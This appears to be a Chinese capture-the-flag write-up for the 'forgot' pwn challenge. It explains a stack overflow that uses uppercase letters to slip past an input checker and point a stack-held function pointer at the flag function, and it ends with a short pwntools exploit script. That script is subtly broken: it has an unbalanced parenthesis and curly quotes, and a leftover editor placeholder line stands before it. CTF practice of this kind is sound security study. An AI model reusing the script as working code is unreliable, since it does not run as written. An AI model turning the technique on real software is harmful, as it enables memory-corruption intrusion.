pwn forget

查看保护机制
开启了NX
用IDA查看伪C代码
如图，阅读程序结构后，发现第二个输入点(41行)可以进行栈溢出，第88行是调用的栈里面的函数地址，所以，如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址，就可以了。找到flag的地址
关注这个循环里面的内容，里面相当于正则表达式的判断，但是你仔细分析里switch中的函数时，可以发现没有判断大写字符的地方，我们可以注入大写字符，来达到不改变v14的值的效果。

可以确定的是栈上面的变量覆盖，但是覆盖地址的时候需要注意*(&v3 + --v14)这个式子，我们需要把函数地址放到这个地址上面(&v3是栈上面的地址，其计算是按照字节来计算而不是位，所以做的时候要注意计算的答案)。由于v14的初始值为1，并且里面正则判断的时候没有关于大写字符的判断，我们就可以直接写入大写字符覆盖v2，并将v3覆盖为我们需要的函数的地址，就可以拿到flag
 构造exp在这里插入代码片
from pwn import *
p = process(’./forgot’)
p.recv()
p.sendline(‘ShadowQ’)
p.recv()
p.sendline(‘A’*32+p32(0x080486cc)))
p.interactive()